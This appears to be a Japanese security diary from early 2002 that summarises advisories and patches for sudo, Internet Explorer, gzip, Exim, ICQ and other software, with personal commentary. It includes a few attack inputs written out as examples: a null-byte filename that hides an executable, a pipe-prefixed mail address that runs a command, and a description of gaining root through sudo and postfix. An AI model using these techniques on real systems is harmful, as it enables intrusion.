「Turbolinux Security Server 7 NetSniper」、 Sniper というのは 韓国 Wins technet の製品なんだそうです。しかし、いいお値段ですねえ。
lycos.jp というところは Message-Id: <200201180220542781155838lycos.jp> なんてモノをつけて下さる模様です。おかげで fml が reject するじゃないか。
Microsoft ISA Server 2000 SP1 が出たようです。 [ISA] ISA Server 2000 Service Pack 1 で修正された問題一覧 、 [ISA] ISA Server 2000 Service Pack 1 関連情報一覧 。
コンピュータ大量紛失の英国防省。議会に対して無回答 (ZDNet)、職員みんなで盗んでいるのかな。
「スクリプトは通常、安全です。スクリプトの実行できるようにしますか?」 何ィッ?! memo ではスクリプトなんか使ってないぞ?! なんでこんなメッセージが出るの?
……IE を再起動したら消えた。なんかもうボロボロってかんじ。
【緊急アンケート】 あなたのブラウザは安全ですか? (日経 IT Pro)、 「主に」の選択肢が 1 つなのは気に入らないなあ。 私の場合は w3m と mozilla の利用比率はほぼ半々なのに (どっちも選択肢にないじゃん……)。 私の場合、w3m:mozilla:IE = 4:4:2 くらいなのだ。
しかしこのアンケート、たとえば「mozilla はデフォルトのまんま使ってるけど IE はガチガチに設定してるし」という場合はどう答えていけばいいんだろう。 (たとえば Q6)
あら〜、MS01-059 につながりませんねえ。
Microsoft OLE DB Provider for ODBC Drivers error '80004005' [Microsoft][ODBC SQL Server Driver][SQL Server]Cannot open database requested in login 'Japan'. Login fails. /japan/technet/library/Secinc/dbConn.inc, line 6
ssh 1.2.33 が出たそうです (info from installer ML)。 実質的な差はこれだけですね:
diff -urN ssh-1.2.32/rsaglue.c ssh-1.2.33/rsaglue.c --- ssh-1.2.32/rsaglue.c Sat Oct 20 21:47:30 2001 +++ ssh-1.2.33/rsaglue.c Thu Jan 17 22:35:34 2002 @@ -277,7 +280,7 @@ if (time(NULL) - last_kill_time > 60 && getppid() != 1) { last_kill_time = time(NULL); - kill(SIGALRM, getppid()); + kill(getppid(), SIGALRM); } fatal("Bad result from rsa_private_decrypt"); }
sudo ですが、さっそく 1.6.5p1 が出てます (info from installer ML)。 S/Key まわりの不具合など。 web page はまだ 1.6.5 のままみたい。 ftp://ftp.sudo.ws/pub/sudo/ などからどうぞ。
なんかもう、疲れたぞ……。
FreeML から、詳細なトラブルレポートが送られてますね。 メール では web page よりも詳細な情報が送られたってコトなのかな。 トラブル自体はアレですが、 ちゃんとトラブルレポートするあたりは偉いなあ。
しかし、ほんとに遅れまくりですね。 postfix + qmail から qmail only に移行したみたいですけど、……。
ip_filter 3.4.23 が出たそうです。
Windows 2000/XP 用のパケットキャプチャツール NGSSniff というのがあるそうです。 ドライバ等、他のソフトは必要ないのだそうです。
Oracle Auditing Tools てのがあるんですって。
[port139:00939] XP の Guest アカウント
マズすぎ。
Cisco Security Advisory: Hardening of Solaris OS for MGC
MGC そのものではなく、MGC を動かすための Sun Solaris に関する advisory。
Re: [RHSA-2002:004-06] New groff packages available to fix security problems
Debian には関係ないんだそうだ。
Internet Explorer Pop-Up OBJECT Tag Bug
IE 6 に弱点。PopUp オブジェクトには組み込みオブジェクトを挿入できるが、 これを利用するとアクティブスクリプト (JavaScript) から任意のファイルを開いたり、任意のコマンドを実行できたりしてしまう。 http://www.osioniusx.com にデモスクリプトが用意されている。
回避するにはアクティブスクリプトを無効にする。
MSIE may download and run programs automatically - details
MS01-058: 2001 年 12 月 13 日 Internet Explorer 用の累積的な修正プログラム 問題の詳細。ファイル名として README.TXT%00PROG.EXE みたいな感じで指定するのだそうだ。
[memo:2688] How Netscape-Enterprise server vulnerable to cross-site scripting attack
Netscape Enterprise 4.0 の cross-site scripting 脆弱性の詳細。
[memo:2650] 2ch に新 fusianasan トラップ
[memo:2656] において、2ch.net の (広義の) cross-site scripting 脆弱性によるものだとフォローされている。
Internet Explorer SuperCookies bypass P3P and cookie controls
Windows Media Player の「インターネットサイトによるプレーヤーの個別識別を認める」オプションが有効 (デフォルト) の場合、IE 6 の P3P 機構を回避できる "SuperCookies" を構築できてしまう、という指摘。 対抗するには、「インターネットサイトによるプレーヤーの個別識別を認める」を無効にすればよい。
関連報道: IEにセキュリティーバグが続出 (CNET)
Windows 98SE 上の IE 6 に MS01-058 patch を適用したあとで Windows XP Pro に upgrade してから Windows Update すると、MS01-058 の再適用がされない、という話。
2002.01.15 の gzip 1.2.4 may crash when an input file name is too long (over 1020 characters) に追記した。 FreeBSD での状況に対するこがさんの発言を追記。
こがさんが、これって FreeBSD でも起きるのでは? とおっしゃっていらっしゃる。
ユニバーサル プラグ アンド プレイに含まれる未チェックのバッファによりシステムが侵害される (MS01-059) がらみの話。MS01-059 からは link されていないので注意。
しかしよくわからんなあ。 「デバイスの説明 をネットワーク スコープに基づいてダウンロードするよう規制する」ではデフォルト値は「1- 同一のサブネットまたはプライベート アドレスに存在する場合」だと言っているのに、 「デバイスの説明をルーターのホップ数に基づいてダウンロードするよう規制する」 のデフォルト値は「最大 4 までのルーター ホップ数の範囲からのみデバイスの設定を検出」なのか?
あ、もしかして、こういうことか?
プライベートアドレスでない場合 (169.254.0.0/16 とか (笑)) はサブネット内のみ
プライベートアドレスの場合はサブネットがどのように設定されていても「最大 4 までのルーター ホップ数の範囲」
どちらも、まだ get できないみたいです。
Microsoft Network Security Hotfix Checker (HFNetChk) version 3.3
矢野さん情報ありがとうございます。 あ、IIS 6.0 だ。
[memo:2711] によると、【ここ】 に何かがあるようですね。 本来の場所からも get できるようになったみたいです。
JP311401: Windows 2000 Service Pack 2 適用後の セキュリティ ロールアップ パッケージ 1 (SRP1)
西村さん情報ありがとうございます。 ……あ、ページ自体にアクセスできなくなってるし。
2002.01.17 の Security Issue with Sudo and Postfix に追記した。 こがさんからの情報を追記。
HFNetChk のページ から入手できる stksecure.xml ですが、DataVersion: 1.0.1.173 のままであるものの、LastDataUpdate: 01/16/2002 となって、いくばくかの変更がなされている模様です。西村さん情報ありがとうございます。
telmethod.com のサービスがまともに動いてないみたいですね。
絶対不可能!、つまり PASSWORD BULLY にリストされてるアプリの「パスワード」はみな脆弱だというわけですな。 このテのツールはいくつかあったはず。
法務省、電子公証制度の運用開始 (japan.internet.com)、どんどん進んでます。 公証人の PC を hack/crack できれば、……。
サン,Solaris 9 on Intelのリリース延期決定を再検討へ (ZDNet)、なくなるよりは、そのへんの Linux distrib. 程度の値段はつける、でもいいのかな。そのかわり source も同梱してほしいな。
ゲイツ氏、ついに目覚める? Windows が OpenBSD のようになる、と期待してもいいんだろうか。 (それは……ねえ)
ゲイツの新方針:「新機能よりセキュリティー」 (CNET)
sudo 1.6.0〜1.6.3p7 までに弱点。 postfix (に含まれる sendmail プログラム) がインストールされていると、攻撃者は sudo を経由して root 権限を得られる。
これは sudo 1.6.0 以降において、管理者あてメールを root 権限で送るようになったことに起因する。これは user が、メールを送っている sudo を kill できないようにするためだ。しかし、ここで起動されるのが postfix に付属する sendmail プログラムだと、 攻撃者は自身が設定した環境変数 (MAIL_CONFIG や MAIL_DEBUG かなあ……) によって sendmail プログラムに影響を与えることができる。 また sudo は sendmail プログラムを実ユーザ id, 実行ユーザ id 共に 0 (= root) の状態で実行するため、呼ばれた側は、実は suid プログラムから呼ばれたこととはわからず、呼ばれ側 (= sendmail プログラム) で権限を落とすこともできない。 結果として、攻撃者はまんまと root 権限を得られる。
この問題を起こす組みあわせは、今のところ postfix の sendmail プログラムだけだという。 また、root としてメールを送るのではなく一般ユーザ権限で送るようにするには、 sudo 1.6.5 以降で設定オプション --disable-root-mailer を使えばよい。 デフォルトで --disable-root-mailer になるべきだと私は思うが、そうなってはいない模様。 注意しましょう。
こがさんから (ありがとうございます):
今回の問題は、sudo が環境変数をほとんどクリアせずに、メイラが root 権限で実行してしまうことにあります。 postfix 版の sendmail では、環境変数 MAIL_CONFIG と、設定での debugger_command で簡単に任意のコマンドを root 権限で実行できてしまいます。 postfix 以外でどうなのかですが、Mandrake のアナウンスでは sendmail も 駄目なように書いてあります。しかし、sendmail で扱う環境変数 (直接扱う のは HOSTALIASES と HOME だけ) では悪さできそうにありません。 なお、LD_LIBRARY_PATH のような危険な環境変数については、かなり早い段階 でクリアされる実装になっており、その後でしかコマンド (含むメイラ) は 実行されません。具体的な環境変数名は、1.6.3p7 では、 static struct env_table badenv_table[] = { { "IFS=", 4 }, { "LOCALDOMAIN=", 12 }, { "RES_OPTIONS=", 12 }, { "HOSTALIASES=", 12 }, { "LD_", 3 }, { "_RLD", 4 }, #ifdef __hpux { "SHLIB_PATH=", 11 }, #endif /* __hpux */ #ifdef _AIX { "LIBPATH=", 8 }, #endif /* _AIX */ #ifdef HAVE_KERB4 { "KRB_CONF", 8 }, #endif /* HAVE_KERB4 */ #ifdef HAVE_KERB5 { "KRB5_CONFIG", 11 }, #endif /* HAVE_KERB5 */ { "ENV=", 4 }, { "BASH_ENV=", 9 }, { (char *) NULL, 0 } }; です。
[aml 26045] 911以降のオンラインにおける市民的権利(英国)、あちこちで「1984」してるんですねえ。
[aml 26051] アムネスティより緊急行動要請、「対テロ戦争」の実体はこんなもの。
アドビが中国から撤退? (CNET)、 とっとと去ればいいのに。
セキュリティのつぼ(3)
防御困難なメールアドレス詐称への対策 (@IT)、
「膨大なユーザーを抱えているプロバイダでは数万通
」?
桁が違うのでは。
それも、1 つや 2 つではなく。
・from:不正メールの拒否
メールサーバとシェルスクリプトなどを組み合わせて、SMTPで受け取ったメールヘッダのfrom:欄を調べる。JPNIC Whoisなどを利用して、実在するドメインかどうかを確認してから配送するようにする。実在しないドメインの場合は中継せずに管理者あてに送付するか、そのメールを削除する。
whois を使う?! なんじゃそりゃあ……。
MSが提供する「ブラウザのセキュリティ チェック」,しかし相変わらずの情報不足 (日経 IT Pro)、[memo:2521] にあるように User-Agent で check している模様。
“.NET ウイルス” に関する情報 (MSKK) 出てます。
これ↓、いつまで送られつづけるんだろう。 SDEX 正式講読してからずいぶん経過しているんだが、 何か明示的なアクションを起こさないといけないんだろうか。
---------------------<試験配信終了のお知らせ>----------------------- いつもご愛顧ありがとうございます。Scan編集部です。 7月より試験的に配信しておりました弊誌「Scan Daily Express(SDEX)」 がこの度、本格的な販売を開始に伴ない、配信終了となりました。 本日配信号での内容は下記のようになっております。
……どうやらバガボンド プレスクラブを退会するしかない模様です。 しかしなあ。あまりにしつこすぎる案内は逆効果だと思うんだが。 SDEX については、早期に正式講読した人ほど「早く入ってソンした〜」と思ってるだろうし。 こりどらすさん情報ありがとうございます。
いや〜こういう PC 欲しいですねえ。 いきなり cryptme とかに渡しちゃったりするとか。
とか言ってるそばから、市販中古パソコンにデータ 診療明細書が外部流出、名古屋の学生購入 (中日新聞)
なんてのも出てますし (前田さん情報感謝)。
「市販ソフトで復元したところ
」
というのがポイントですね。FAT で del しただけって感じ?
消し消し系の話は 米軍、国防総省等の規格に準拠したデータ抹消ソフトの強化版を新発売 〜パーソナルメディアが「ディスクシュレッダー・スーパー」を9月18日より出荷〜 のところにいくばくか書きましたのでそちらを。 BCWipe for UNIX 使ってみた人っているのかな。
ユニバーサル プラグ アンド プレイに含まれる未チェックのバッファによりシステムが侵害される (MS01-059) で一躍有名になった、Windows の Universal Plug and Play (UPnP) 機能を無効にするプログラム。 UPnP がどうしても必要な人を除いて、ぜひ実行しておこう。
……しかし、読み進んでいくとこんな記述が:
JAN 3, 2002: We have received preliminary reports of the UPnP service being silently re-enabled without the users' knowledge or permission. We hope that this is an innocent side-effect of background XP updates, but it is our position that users have the implicit right to decide how their computers operate, and what services they run.
Please keep an eye on this for a while by re-running UnPnP from time to time to check on the "disabled" status. If you find that UPnP has become silently re-enabled on your system, please drop a note to us at support@grc.com . If this behavior is confirmed, we will immediately enhance UnPnP to prevent this silent re-enabling. Our eMail system subscribers will then be notified of this enhancement.
なんか、最近の Microsoft はこんなんばっかですなあ。 勝手に設定変えちゃいかん。
2002.01.15 の CERT Advisory CA-2002-01: CDEのサブプロセスコントロールサービスに付け込み可能な脆弱性が存在する に追記した。 LAC 邦訳版も登場。
その patch を適用しても、Internet Explorer Document.Open() Without Close() Cookie Stealing, File Reading, Site Spoofing Bug とかが残るんですけど。IE 5.01 SP2 ならだいじょうぶなんですけどねえ。 やっぱり IE 5.01 SP2 をもうちょっと維持しつづけたほうがいいと思うんですけど。
bind 8.3.0 出たそうです。
sendmail 8.12.2 出たそうです。
@Random ですが、とりあえず 2 月下旬ということで話が進んでます。 「プレゼンさせろォ」という方がいらっしゃいましたら、ぜひおねがいします。
[WSJ]MSのサーバに障害。Windows XP用パッチがダウンロードできない状態に (ZDNet)、[memo:2678] 以下のスレッドでも話題になっていた件ですが、XP は Windows Update への依存度が高いので困っちゃいますよね。
多様化する災害対策 (上) と (下) (日経 IT Pro)。ヒコーキが飛んでくる時代ですからね。 そういえばテロリストもご用達の (とゆーか誰でも使う) ソフトの最新版、 Microsoft Flight Simulator 2002 が出るそうで。 (typo fixed: 入江さん感謝)
クローズアップ: 悪質運転 厳罰化進む (毎日)、飲酒運転と信号無視は厳罰化してもいいと思うけど、速度違反はちょっと違うような気が。「制限速度 50km/h って書いてあるけど世の中的には 70km/h で流さないとひどい渋滞になる」なんて道路もあるわけで。 そういう現実的でない道路行政についてもちゃんとメスを入れてくれナイト。
第11回 NT-Committee2 関東勉強会、2002.02.02。 豪華な顔ぶれなので 120 人は一瞬にして埋まっているかも。
ICQ 2001b Beta v5.18 Build #3659 より前に弱点。 バッファオーバーフローが発生するため、DoS 攻撃の他、 remote から任意のコードを実行させることも可能であるという。 ICQ 2001b Beta v5.18 Build #3659 で fix されているそうだ。 ダウンロードページ から入手できる。
CERT/CC VN 出ました: Vulnerability Note VU#570167: ICQ contains a buffer overflow while processing Voice Video & Games feature requests 。
[SPSadvisory#44]Wnn jserver JS_MKDIR command vulnerability
FreeWnn-1.1.0、Wnn6/SGI IRIX 6.5 に弱点。 mkdir システムコールのない OS では mkdir コマンドを system() 経由で実行していたために脆弱な状態に。 jserver 実行権限で任意のシェルコマンドを実行できてしまう。 FreeWnn-1.1.0 + patch-1.1.0-a01 や FreeWnn-1.1.1-a017 では fork + exec するようになったので脆弱性が排除された。
Debian GNU/Linux 2.2r5 released なんだそうです。カナダさん情報ありがとうございます。
DSA-101-1 sudo: Local root exploit
これって sudo 1.6.3p6 で fix された件 の話? ……じゃなくて、これの話みたい。 from debian sudo patch:
--- sudo-1.6.2p2.orig/logging.c +++ sudo-1.6.2p2/logging.c @@ -456,8 +457,8 @@ } argv[i] = NULL; - /* Run mailer as root so user cannot kill it. */ - set_perms(PERM_ROOT, 0); + /* Running as root is bad. Start sendmail as user */ + set_perms(PERM_FULL_USER, 0); execv(mpath, argv); _exit(127); }
ちなみに sudo の最新は 1.6.4p1 です。 でも 1.6.4p1 だと PERM_FULL_ROOT になってるぞ?
sudo 1.6.5 が出てます。NO_ROOT_MAILER (--disable-root-mailer) を定義すると PERM_FULL_USER になる模様。定義しましょう。
DSA-103-1 glibc: buffer overflow
RHSA-2001:160-09 と同じ話かな?
[RHSA-2002:004-07] New groff packages available to fix security proble
groff コマンドに buffer overflow するバグがあって、LPRng と組みあわせると lp ユーザ権限を取れるらしい。
CERT Advisory CA-2001-31: CDEサブプロセスコントロールサービスにバッファオーバフローが存在する を狙ったスキャンと攻撃が増加しているという話題。 対 Solaris 用の exploit が出回っている模様。 ただし、狙われている CDE Subprocess Control Service (dtspcd) と同じ 6112/tcp を利用するゲームがあるそうで、6112/tcp が来るからといって attack だと思ってはいけないそうな。
Solaris 用の patch はすでに出ているので適用すればよい。 その他の OS についても適用しておこう。
LAC 邦訳版も出てます。 原文 link 忘れてた: CERT Advisory CA-2002-01 Exploitation of Vulnerability in CDE Subprocess Control Service 。
2002.01.10 の Flashファイルに感染するウイルス出現,ただし危険度は低 に追記した。 ZDNet Security How-To から詳細な関連記事。
InterScan VirusWall のバナー出力を止める方法。
from Microsoft: Information on the So-Called ".NET Virus" 。KB Q316827 はまだ出てないみたい。 関連: 「W32.Donutは.NETウイルスではない」とマイクロソフト (ZDNet エンタープライズ)。 終わりなき戦い、終わりなき索敵。
日本語版も出た: “.NET ウイルス” に関する情報 。
gzip 1.2.4 に弱点。長大な入力ファイル名によりバッファオーバーフローが発生する。 gzip による自動圧縮・伸張をサポートしている ftp サーバ (ex. wu-ftpd) において脆弱性が発生するとしている。 patch があるので適用する。 BUGTRAQ bugid 3712。 Debian fix: [SECURITY] [DSA 100-1] New gzip packages fix potential buffer overflow
FreeBSD 方面を見てみたら、gnu/usr.bin/gzip/gzip.c 1.8 でそれっぽい fix が。1997 年って書いてあるぞ……。
こがさんが FreeBSD の状況に関して freebsd-security ML に投稿している。 zdiff や znew シェルスクリプトがちょっとマズゲの模様。
Vine: gzip にセキュリティホール
NetBSD: NetBSD Security Advisory 2002-002: gzip buffer overrun with long filename
FreeBSD: zdiff や znew には 2002.01.28 に修正が入っている。 4.5-RELEASE にはこの修正が含まれている。
Internet Week 2001チュートリアルプレゼンテーション資料公開のお知らせ だそうです。(info from Tea Room for Conference)
LiveUpdate1.7 が出ていました。「電子署名を採用しセキュリティを強化」だそうです。 あわせて、LiveUpdate管理ユーティリティ1.5.3.21 も出ています。
enterprise and consumer product support はアンテナに入れておきます。
.NETがウイルス作者の標的に (ZDNet)、まあそんなもんでしょう。
あぁっ、ミスリードしてしまった……。来週号で訂正記事書かねば。
2002.02.01 から。 日本産業協会 (Netscape-Enterprise/2.01c) で違反メールを収集するということなので、 違反メールをみかけたらばんばん forward してあげよう。forward 先は meiwaku@nissankyo.jp だ。 ……ってちょっとまて、nissankyo.jp 側には web page ないじゃん。 ほんとに mail 届くのかなあ? 心配。 mesh.ad.jp が管理してるっぽいけど。
関連: 「!広告!」をSubjectに表示義務 経産省がスパム対応で (ZDNet)、 経産省が迷惑メール対策 告発用窓口も設置 (毎日)、 広告メールには「!広告!」と表記せよ--経産省が義務付け (日経 BizTech)。 ほら、みんな「!」は「全角文字」だと思ってるぞ。それでいいのか経産省。
しかし 経産省、SPAMはOKな省令を2/1より施行 (slashdot.jp) にあるように、「パブリックコメント募集」はアリバイづくりでしかなかった模様。 気に入らないな。 まあ、まともにやる奴ならそもそも「!広告!」なんてセンスのないコトはやらないのだろうが。 しょせん e-Japan というのはこんなもんなんでしょうねえ。ダメすぎ。
2002.01.10 の Flashファイルに感染するウイルス出現,ただし危険度は低 に追記した。 Macromedia のオフィシャル情報が登場。
Solaris 9,Intel版は延期 (ZDNet)、http://www.sun.co.jp/software/solaris/binaries/get/ からも Solaris8 x86 のバイナリダウンロードが消えてしまっているようです。 メディアキットはまだ ok みたいです。 藤井さん情報ありがとうございます。
光通信による“世界初”の研究ネットワーク「スーパーSINET」きょう開通式 (ZDNet)、細かいトラブルはいくつか出てるみたいですね。
これまた原則 link だけでごかんべん。
AIM 問題 の回避ツール。
linuxsecurity.com の 2001-exploits.tgz というのは、2001 年度の exploit 総まとめみたいです。 exploit と書いてあるけど、advisory も多く含まれています。
RE: ISAPI answer to "Microsoft IIS False Content-Length Field DoS Vulnerability" ?
Microsoft IIS/5 bogus Content-length bug. 対策用フィルタだそうです。
ディスプレイから AM ラジオにトランスフォーム! (info from 遠吠え日記)
「ActionScriptはスタンドアロン版のムービーでのみサポートしており,プラグイン版ではサポートしていない
」
のがポイントのようです。
web ブラウジングしている限りにおいては、問題はなさそう。
関連記事 マクロメディアの『Flash』ファイルを介した新ウイルス (CNET)
では:
マクロメディアのサンタンジェリによると、同社はShockwave Flashファイルと各パソコンにインストールされているFlashプレーヤー間のファイルの関連付けを無効にする修正パッチを数日以内に発表する。さらに、次のバージョンではプレーヤーのセキュリティーホールを修復する予定だという。
その「修復」がどの程度のものなのかが問題になるような。
memo ML の [memo:2527] 「Shockw ave Flash 」を感染させるウイルス のスレッドにも情報があります。
Macromedia オフィシャル情報: Potential standalone Flash Player security issue and SWF Clear Utility。 .swf と Flash player との関連付けを削除する「SWF Clear Utility」も配布されているそうな。 patch はまだ。
関連: Flashに忍び寄るウイルスの影 (ZDNet Security How-To)。
時間がとれそうにないので、link だけでごかんべん。
IMail Web Service User Aliases / Mailing Lists Admin Vulnerability
Security Advisory for Bugzilla v2.15 (cvs20020103) and older
ICQ remote buffer overflow vulnerability
フォローも参照。
svindel.net security advisory - web admin vulnerability in CacheOS
最新の PGP 7.1.1 では fix されているそうです。
[memo:2534] 開発者のための反面教師的暗号解読入門初級編
これが e-Japan だ!! ……ってことだったら悲しすぎ。
Cisco Security Advisory: Multiple Vulnerabilities in Cisco SN 5420 Storage Router
http://www.cisco.com/warp/public/707/SN-multiple-pub.shtml は存在しないって言われるんだが……。
TESO-Advisory: LIDS vulnerability
fix 版があるので upgrade すればよいみたい。
今年もウイルスと闘おう (日経 IT Pro)、 『ウイルス対策の“常識”に「クライアント・ソフトのセキュリティ・ホールをふさぐ」ことが加わろうとは,一年前には予想していなかった』、 それって想像力が欠如しているだけだと思うんだけど……。
それにしても、NetSecurity.ne.jp ならともかく、日経 IT Pro で「IE / OE すてすて」な記事が書かれてしまうという時代になったのですね。
法務省、戸籍手続きのネット化検討
(asahi.com)、なんでもかんでもオンラインにすればいいってもんじゃないという発想はない模様。
『「確実に本人確認できる点はよい」と評価する人もいる
』
と言っているのがどんな人なのかがよくわからない。
どうやると「確実に本人確認できる」んだろう。
まさか、「電子証明書」を使えば本人認証が絶対安全完璧だとでも思ってるんだろうか
(そんなわけないじゃん)。
それとも、現行方式があまりにも脆弱杜撰なので、電子証明書の方がなんぼかマシということなんだろうか。
(info from EVERYDAY PEOPLE)
SONY という会社は、JavaScript を有効にしておかないとまっしろにしか見えないというページを平気でつくるトコなのね……。
locale 話、FreeBSD おぼえがき の 2002年01月08日(火)23時03分23秒 で結着 (引用すべき個所が違ってたのは修正された模様)。 あとで follow を投稿しておかなきゃ。 そもそも Locale name guideline は glibc から話がはじまっているそうですし ([FreeBSD-users-jp 66348])。
九州南西海域不審船情報 (info from [aml 25942] 海上保安庁不審船情報)。 movie もババンと公開しちゃえばいいのに。
http://sakots.pekori.jp/imgboard/imgs/img20020107162803.jpg、わははは (info from [macosx-jp:09075], もとネタは 2ch.net だそうで)。
Windows 2000 SP2 をインストールしたサーバとの間との通信で path MTU discovery がうまく動かなくなる、という話みたい。 Windows 2000 SP2 サーバと Windows 9x/Me/NT/2000 クライアントとで VPN してるときや、 NAT ルータを介して Windows 2000 SP2 サーバと交信する場合に顕著、 ということなのかな。
たいていのスパイウェアは virus ではない、と、少なくともトレンドマイクロは判断している模様。
龍大のとある先生がおっしゃっていらっしゃった奴だな……。 ずいぶん前に流行ったものが、また流行りはじめている……ということなのかな。
個人的には、記事そのものより、記事中リンク先の Windows XP Home Edition からWindows XP Professional へのアップグレード方法 にある
現在マイクロソフトでは、Windows XP Home Edition から Windows XP Professional へのアップグレードの際に、 技術的な問題が起こる場合があることを確認しており、 その対策のための必要な情報をまとめております。 正式にご案内をいたしますまでの間、Windows XP Home Edition がインストールされた環境へ Windows XP Professional をアップグレードするのをお待ちいただきますようお願い申し上げます。
という記述の方が気になる……。
パソコン初心者のための安全なインターネット講座 〜その1〜(2002.1.8) (NetSecurity)、 いまいち記事の focus がぼけているような気が。 「頻繁に登場する hotfix を即座に適用しないとあぶない」 「実は、それを適用していてすらあぶない」 が言いたいことだと思うのだが、……。
アンチウィルスゲートウェイを導入したが設定不良で loop ってるというのは、けっこうありがちな状況のようです。 導入される方は注意しましょう。 (2001.01.09 ホスト名削除)
locale 話ですが、FreeBSD-users-jp ML へ 振ってみた ら、このような reply をいただいた。 4.5-RELEASE からではなく 4.6-RELEASE からになるそうで。 また ja_JP.eucJP でも問題ないそうだ。 Locale name guideline [Public Review Draft 2001-05-31] に適合するようには見えないのだけど、これドラフトだし、 最近では ja_JP.eucJP という名前のサポートがいちばん多いみたいだし。
Samba 2.2.2日本語版リリース1.0 が出たそうです。 http://www.samba.gr.jp/ の記述はまだ古いみたいなので、 ftp://ftp.samba.gr.jp/pub/samba-jp/samba-2.2.2-ja/ からどうぞ。
apple.co.jp 方面、さすがに重くなってる模様。 新 iMac いいなあ。ついに標準 OS が MacOS X になったようだし。 そろそろ買いか? 大蔵大臣に聞いてみよう。 新 iMac SuperDrive は AppleStore で 224,800 yen ですね。
つーか、このサーバ自体が重いぞ。……ちょっと調整。 つながらなかった人すんません。 SINET 京都大学ノードが 11:31〜12:03 まで変だったみたい。
紹介するタイミングを完全に逃してます。すいません。
MS SQL Server 7.0/2000 が buffer overflow する他、SQL Server 7.0/2000 が呼び出す C ランタイムに format バグがあるという話。前者では SQL Server 動作権限による任意のコードの実行が、後者では DoS 攻撃が可能だという。 詳細: @stake advisory: Multiple overflow and format string vulnerabilities in Microsoft SQL Server (@stake)。
fix が出ているので適用すればよい。SQL Server 用 fix と C ランタイム用 fix を別々に適用する必要がある。 C ランタイム fix は NT/2000 用と XP 用が用意されている。
C ランタイムの format バグが他のプログラムにも影響するのでは? という話は FAQ に出ているので、心配な方は読んでおこう。 まあ、心配な向きは C ランタイム patch を適用しておけば ok ってことでしょう。
NIS 2002 のスクリプト、広告などのフィルタ機能に誤変換があるのでは、という指摘。 これが何らかの脆弱性に発展するとは思えないが、聞いていて気持ちいい話でもない。 フォロー されているように、確かに誤変換が発生するようだ。 また、proxy や「信頼のネットワークアドレス」の設定にも依存するようだとフォローされている。 http://www.keddy.ne.jp/~ill/a.html にテストページが用意されているので、NIS 2002 利用者は試されたい。
関連: 多数の i モード EC 構築用CGI で個人情報が多数流出の危険(2002.1.7)。 広く利用されているショッピングカート CGI「ショッピングバスケットプロ」において、 初期設定を変更していない、あるいは別途アクセス制限をかけるなどしていないサイトでは、 顧客情報ファイルを外部から容易に参照可能になってしまっている、ということかな。 security hole というよりは administrative issue のような気はするけど、 インストーラが乱数の tmp dir つくるとかすればこれほど容易にはならないだろうし。
v5.05i 以降へ upgrade を、というのは CGI PROGRAM SECURITY ADVISORY [CargoPro 3.34, 4.11, 5.20, 5.04i, 5.10wm] の話であって、今回の件とは関係ないみたい。 そういう意味では、開発元の告知も不適切なような気が。
意見できるのは今日までだそうです。意見したい人は急ごう。
小泉首相、憲法違反の伊勢神宮参拝 (麗美のぷらぷら日記 2002/01/04(FRI))、2002.01.04 は私的にとんでもなく忙しかったのだが、 こんなことになっていたとは。
米国で報道されないアフガニスタン民間人犠牲者 (WIRED NEWS)、 ようやく少しずつこういうのが U.S. メディアにも出るようになったか?
クラックされてしまった日本のサイト への link とアンテナ修正。
国交省、電子入札システム利用の注意事項を公表、楽しそうですね。
[aml 25893] FBIは9.11以前に警告を受けていた、警告が生かされないのはよくあることですねえ。
ハイパー日記システム 2.10-pl1 を HDD 上に展開してみるテスト。
penetration technique research site
に「改ざんされたサイトのOpenPort(TCP)ランキング(2001年12月)」
が出ています。Windows と並んで、あいかわらず Linux 多いです。
HiddenLineによる改竄続く 〜国内でも30件近い被害〜
(NetSecurity) もそういう線のようですが、
「Apacheの既知の脆弱性を利用している
」
ってどんな脆弱性? > NetSecurity。
それは Apache/1.3.11 (Unix) mod_ssl/2.5.1 OpenSSL/0.9.5a
っていうサイトが並べていい文字列なのか?
(私も人のこと言えないけどね……)
[memo:2508] HFNetChk用日本語版XML データベース更新、対応しました。_o_
ゴジラ・モスラ・キングギドラ 大怪獣総攻撃、細かい文句はいくつかあるが、なかなかよかったぞ。 さすが金子監督。やっぱりわかっている人は違う。 上映後、前列に座っていたおにいさんが小さく拍手していたのが印象的だった。 そうか、ゴジラ世界では自衛隊じゃなくて防衛軍だったのね。
それにしても、ハム太郎と同時上映というのはやっぱり乱暴な気がするぞ。 「ゴジラ恐いから帰る〜」とか言われて困ってるおとうさんとかいたし。
http://www.geotrust.com/ だと $99/年 で 128bit サーバ証明書が買えるようです。 (from connect24h:2152)
[aml 25863] 2月16日エシュロン国際集会、 東京はええのう。
Description of Svchost.exe (Q250320) (B-) さんち、2001/1/7)
「ないものはないし」──2ちゃんねる管理人・ひろゆき氏が語る“ログ提出拒否”の真意 (ZDNet)、 “ログ提出拒否”の真意ではなく 「ほかにやることあるんじゃないの」の真意のような気が。
@Random ですが、 http://www.at-random.org/ でアクセスできるようになりました。 って、リダイレクトしてるだけなんですが。
あけましておめでとうございます。今年もよろしくおねがいいたします。 って、家庭的にはあまりめでたくない事象が発生したりしているんですが。
うーむ、Flash 5 必須なのか……。 nenga.co.jp のやつはお返事しようとすると見事に拒否してくれるし、 ynot.co.jp のやつは手元の Mozilla 0.9.6 + flashplugin-mozilla-0.4.10 でアクセスすると crash するし。 難儀じゃのう。 FreeBSD 側にも VMware を入れるべきなんだよな、うん。
IE 5.5 SP2 / 6 の GetObject() にまたまた問題があり、local file が読めてしまうという話。 「アクティブスクリプト」が有効である他に、 「ActiveX コントロールとプラグインの実行」 と 「スクリプトを実行しても安全だとマークされている ActiveX コントロールのスクリプトの実行」 が有効な場合に成立する模様。でも通常、全部有効なんだよね。
回避するには上記のいずれかを無効にする。
参照: 新年早々、インターネットエクスプローラに新たな脆弱性 (netsecurity.ne.jp)。
今年はいよいよ来ますかねえ、IM ワーム。 すでに IRC 方面ではポピュラーな気もするんですが。
w00w00 が回避ツール (の改良版) を配布している: w00aimfilter
2001.12.28 の format バグ 3 連発 に追記した。 stunnel format バグについての注記。
DSA-097-1 exim: Uncontrolled program execution
Exim 3.33/3.951 以前に弱点。 [Exim-Announce] Potential security problem によると、 設定ファイル中で直接パイプを使用している場合に問題になる、ということかな。 e-mail address の @ の左側の先頭の文字がパイプ記号 | だと、 パイプの右側にあるコマンドを実行してしまう。|/path/to/danger@hogehoge.jp みたいな感じなのかな。 alias や forward ファイルでの利用では問題ないみたい。
修正版パッケージがあるので適用すればよい。 また、patch が [Exim-Announce] Potential security problem に示されている。
